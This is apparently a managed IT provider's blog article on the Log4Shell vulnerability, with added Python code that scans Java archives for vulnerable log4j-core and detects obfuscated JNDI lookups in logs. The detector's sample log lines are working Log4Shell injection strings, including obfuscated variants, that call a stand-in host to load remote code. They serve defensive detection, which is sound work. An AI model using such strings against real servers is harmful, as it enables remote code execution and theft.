Log4j Flaw Is the Most Serious Cyber Threat in Years, Security Experts Say

Security analysts are alarmed about a bug in software few people know about: the Log4j logging utility for Java applications. The flaw, tracked as CVE-2021-44228, was reported to the Apache project in November 2021 and became public in early December, when it was demonstrated against the Java edition of the Minecraft video game. Log4j evaluated lookup expressions of the form ${...} inside the messages it logged, so an attacker who could get a crafted string written to a log (a chat message, a username, a User-Agent header) could make the server fetch and run attacker-supplied code. From there the attacker could execute code remotely, spread malware or steal sensitive information.

Log4j Vulnerability

The Log4j flaw is alarming because the open-source utility is used in a huge number of Java-based apps to record routine system events and errors. Analysts with Google’s Open Source Insights team found that more than 35,000 Java packages, about 8 percent of the roughly 440,000 in the Maven Central Repository, depended on vulnerable versions of Log4j, most of them only indirectly, through other libraries.

Researchers with Microsoft say that hackers in China, North Korea and other adversarial nation-states are actively scanning systems for the vulnerability, dubbed Log4Shell. During peak activity in December, Cloudflare reported approximately 20,000 exploit attempts per minute. The vulnerability is easy to exploit: a single crafted string in any field the application logs is enough, so even attackers with limited skills can use it, and ready-made toolkits are available on the dark web.

Log4j Flaw Causing Widespread Alarm

Jen Easterly, director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA), has said that Log4Shell is the most serious vulnerability she has seen in her decades-long career. Other security experts agree.

In a recent article on The Verge, Cloudflare CTO John Graham-Cumming said, “There’s a tremendous amount of Java software connected to the Internet and in back-end systems. When I look back over the last 10 years, there are only two other exploits I can think of with a similar severity: Heartbleed, which allowed you to get information from servers that should have been secure, and Shellshock, which allowed you to run code on a remote machine.”

Heartbleed, discovered in April 2014, was a bug in the OpenSSL cryptographic library that let attackers read private keys and other sensitive data out of a server’s memory. Shellshock, discovered in September of that year, was a flaw in the GNU Bash shell that enabled remote code execution wherever untrusted input reached the shell, for example through CGI scripts on web servers. Both vulnerabilities caused widespread panic at the time.

Log4j is in some ways worse because the remediation is hard to scope. Log4j is not a product you patch once but a library embedded in thousands of applications, often bundled inside application archives or pulled in indirectly as a dependency of other libraries. Finding every vulnerable copy requires someone familiar with Java to inspect the organization’s software, including the contents of JAR and WAR files, rather than waiting for a vendor installer.

Mitigating the Threat

Apache has shipped fixed releases of Log4j 2 (2.16.0 removed message lookups and disabled JNDI by default, and the later 2.17.x releases fix follow-on issues; the 2.12.x and 2.3.x branches cover older Java runtimes), but the strategy for applying the fix will vary depending on how the utility is used. For third-party software such as Minecraft, it’s as simple as installing the vendor’s updated version. For in-house applications, developers and system administrators will have to update the log4j-core dependency in every build they identify, transitive dependencies included, or, where an upgrade cannot be applied right away, use Apache’s documented workaround of removing the JndiLookup class from the jar.
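Finding every embedded copy and applying the class-removal workaround, as the two passages above describe, can be scripted. The following Python script is an added example, not code from the original article or from the Log4j project: it walks a directory tree, opens each JAR/WAR/EAR, recurses into archives nested inside them, reports any log4j-core that still ships JndiLookup.class below an assumed safe version, and rewrites a jar without that class. The version threshold (2.17.1), the sample archives and their placeholder class bytes are assumptions constructed for the demo; the fixture run at the bottom stands in for a real directory scan.

```python
import io
import os
import re
import zipfile

# Paths inside a log4j-core jar that identify the vulnerable lookup and its version.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Assumption for this demo: anything below 2.17.1 still carries one of the Log4Shell-family
# advisories. Check the threshold against Apache's current security page before relying on it.
MIN_SAFE_VERSION = (2, 17, 1)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Non-numeric tails are dropped."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if m is None:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def core_version(zf):
    """log4j-core's version from its Maven pom.properties, or None if the file is absent."""
    if POM_PROPERTIES not in zf.namelist():
        return None
    for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "version":
            return value.strip()
    return None


def inspect_archive(data, name, findings):
    """Open archive bytes, record an embedded log4j-core, and recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                      # not a zip container; nothing to inspect
    with zf:
        names = zf.namelist()
        if JNDI_LOOKUP_CLASS in names:
            version = core_version(zf)
            # A copy with no readable version is reported as vulnerable: it needs a manual look.
            vulnerable = version is None or parse_version(version) < MIN_SAFE_VERSION
            findings.append({"archive": name, "version": version, "vulnerable": vulnerable})
        for member in names:                 # fat jars, WEB-INF/lib/*.jar, EARs, ...
            if member.lower().endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(member), name + "!" + member, findings)
    return findings


def scan_directory(root):
    """Inspect every archive under `root`; this is the entry point on a real host."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if filename.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, filename)
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), path, findings)
    return findings


def strip_jndi_lookup(jar_bytes):
    """Rewrite a top-level log4j-core jar without JndiLookup.class (Apache's workaround for 2.x)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_fixtures():
    """Constructed sample archives for a dry run; class bytes are placeholders, not real classes."""
    def jar(entries):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            for entry, data in entries.items():
                zf.writestr(entry, data)
        return buf.getvalue()
    old_core = jar({JNDI_LOOKUP_CLASS: b"placeholder", POM_PROPERTIES: b"version=2.14.1\n"})
    new_core = jar({JNDI_LOOKUP_CLASS: b"placeholder", POM_PROPERTIES: b"version=2.17.1\n"})
    webapp = jar({"WEB-INF/web.xml": b"<web-app/>", "WEB-INF/lib/log4j-core-2.14.1.jar": old_core})
    return {"old-core.jar": old_core, "new-core.jar": new_core, "app.war": webapp}


def vulnerable_archives(archives):
    """Names (with '!' marking nesting) of every archive that still needs patching."""
    findings = []
    for name, data in archives.items():
        inspect_archive(data, name, findings)
    return [f["archive"] for f in findings if f["vulnerable"]]


if __name__ == "__main__":
    for name in vulnerable_archives(build_fixtures()):
        print("VULNERABLE:", name)
```

The nested-archive recursion is the part that matters in practice: a WAR that looks clean at the top level still turns up as `app.war!WEB-INF/lib/log4j-core-2.14.1.jar`. The class-removal function only handles a top-level jar; a copy nested inside a WAR has to be unpacked, rewritten and repacked, or better, rebuilt from an updated dependency.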

Despite the difficulty, organizations should immediately take steps to protect against the vulnerability. CISA has published a list of affected products and vendor updates along with guidance on mitigating the threat. The Federal Trade Commission has warned that it will take action against companies that don’t protect consumer data.

Even after patching, organizations should assume they may already have been compromised during the window of exposure, and should continuously monitor systems for anomalous behavior and indicators of compromise. Attackers obfuscate the lookup string in many ways (nested lookups, case changes, default-value tricks), so security tools that match a single fixed signature will miss many attempts. Organizations should implement a layered security approach with detection that accounts for those evasions rather than one pattern.
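To make the point about fixed signatures concrete, here is an added example that is not code from the original article or from the Log4j project. It evaluates nested lookups from the inside out the way Log4j’s string substitution does (modelling only the behaviours attackers abuse for obfuscation: the `:-` default value, the lower/upper lookups and the case-insensitive prefix), extracts the JNDI target, and compares the result with a plain `${jndi:` signature over a handful of constructed access-log lines. The log lines and the 203.0.113.0/24 addresses are invented for the demo.

```python
import re

# An innermost "${...}" lookup: its body contains no further braces.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
JNDI_MARK = "<jndi-lookup>"
# The kind of fixed signature a simple filter would use, kept only for comparison.
NAIVE_SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def resolve_lookup(body):
    """Evaluate one innermost lookup body roughly as Log4j's StrSubstitutor does.

    Returns (replacement_text, jndi_target_or_None). Only the behaviours attackers
    use for obfuscation are modelled: the ":-" default value, the lower/upper
    lookups, and the case-insensitive lookup prefix.
    """
    var, sep, default = body.partition(":-")        # "${var:-default}"
    prefix, _, arg = var.partition(":")
    prefix = prefix.lower()                          # Log4j lower-cases the prefix
    if prefix == "jndi":
        return JNDI_MARK, arg
    if prefix == "lower":
        return arg.lower(), None
    if prefix == "upper":
        return arg.upper(), None
    # env, sys, date, an empty prefix, ...: not resolved here, so the default value
    # (if any) is the text the attacker intended to survive.
    return (default if sep else ""), None


def find_jndi_lookups(text):
    """Peel nested lookups from the inside out and return every JNDI target found."""
    targets = []
    while True:
        m = INNERMOST.search(text)
        if m is None:
            return targets
        replacement, target = resolve_lookup(m.group(1))
        if target is not None:
            targets.append(target)
        text = text[:m.start()] + replacement + text[m.end():]


# Constructed access-log lines (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [10/Dec/2021:13:02:41 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.11 - - [10/Dec/2021:13:02:42 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:13:02:43 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.99:1389/b}"',
    '203.0.113.13 - - [10/Dec/2021:13:02:44 +0000] "GET /${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.99:1099/c} HTTP/1.1" 404 196 "-" "curl/7.79.1"',
    '203.0.113.14 - - [10/Dec/2021:13:02:45 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.99/d}"',
]


def scan_log(lines):
    """[(line_number, [jndi targets])] for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        targets = find_jndi_lookups(line)
        if targets:
            hits.append((number, targets))
    return hits


def naive_scan(lines):
    """Line numbers the fixed signature alone would flag, for comparison."""
    return [number for number, line in enumerate(lines, 1) if NAIVE_SIGNATURE.search(line)]


if __name__ == "__main__":
    print("fixed signature flags lines:", naive_scan(SAMPLE_ACCESS_LOG))
    for number, targets in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: JNDI lookup to {targets}")
```

On the constructed sample the fixed signature flags only line 2, while the evaluator flags lines 2 through 5 and recovers the ldap, rmi and dns targets the attacker hid behind nested lookups. The same evaluator can be pointed at any field an application logs, not just the User-Agent or request path shown here.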

Log4Shell is the most serious vulnerability to come along in years. The cybersecurity experts at GDS are here to help you assess your exposure and reduce your risk. Call today for a confidential consultation.

Benefits of Managed IT Services from Global Data Systems

  • Strategic Managed IT: We help you solve your technology related business problems.
  • Connectivity: We get you reliable, secure connectivity anywhere in the western hemisphere in 48 hours.
  • Support: When you need help simply call our 24x7x365 support number.
  • Billing: Instead of managing hundreds of vendors, get one easy-to-read bill from GDS.

Contact Managed Services Provider, Global Data Systems >